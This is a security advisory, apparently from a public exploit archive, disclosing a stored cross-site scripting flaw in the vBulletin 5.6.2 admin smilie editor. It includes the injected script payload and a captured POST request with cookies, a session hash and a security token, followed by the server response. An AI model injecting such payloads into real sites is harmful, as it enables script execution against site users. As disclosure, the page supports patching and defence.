vBulletin 5.6.2 Persistent Cross Site Scripting

2020.08.20
Credit: Vincent666 ibn Winnie
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: vBulletin 5.6.2 Stored XSS # Date:15.08.2020 # Author: Vincent666 ibn Winnie # Software Link: https://www.vbulletin.com/en/features/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Blog : https://pentest-vincent.blogspot.com/ # PoC: https://pentest-vincent.blogspot.com/2020/08/vbulletin-562-stored-xss.html PoC: Go to the Admin panel -> open Smilies -> Smilies manager->Edit Smilie Categories->edit Smile: https://72329406fb3a-041342.demo.vbulletin.net/admincp/index.php https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4 Put our code in the field "Title" or "Text to Replace" and other fields. Our code: ""><script>alert("field")</script><marquee>test</marquee> And save this. We have a stored XSS and html code injection. Picture: https://imgur.com/a/JUsmPye Video: https://www.youtube.com/watch?v=D526ZLgH90Y&feature=youtu.be https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=update Host: 72329406fb3a-041342.demo.vbulletin.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 399 Origin: https://72329406fb3a-041342.demo.vbulletin.net Connection: keep-alive Referer: https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4 Cookie: vb41342lastvisit=1597392323; vb41342lastactivity=1597521919; vb41342np_notices_displayed=; vb41342contentlist_perpage=25; vb41342sessionhash=845f579d01bdd42b4bf3020d4893f366; PHPSESSID=d8cafaa942534428ce54ea2ba5a221ec7ed9532a6d9666b8; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41342cpsession=18ca6bf5d79e5564ac2aa3a201612500; vb41342sitebuilder_active=1 Upgrade-Insecure-Requests: 1 s=845f579d01bdd42b4bf3020d4893f366&do=update&adminhash=38c14dd475e4de2e3f95676226993ebd&securitytoken=1597523664-7fba45cf7add9630b2fda3e409ad0da7beec797c&title=Smile""><script>alert("field")</script><marquee>test</marquee>&smilietext=:)&imagespath=smile.png&imagecategoryid=4&displayorder=1&id=1&table=smilie&page=1&perpage=20&massmove=0&returnimagecategoryid=4 POST: HTTP/1.1 200 OK Date: Sat, 15 Aug 2020 20:34:36 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' Expires: 0 Cache-Control: private, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Connection: keep-alive, Keep-Alive Keep-Alive: timeout=2, max=100 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 p.s. Today i haven't idea how to use this bug, because only the admin user has an access to the admincp and can insert xss code in the fields.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top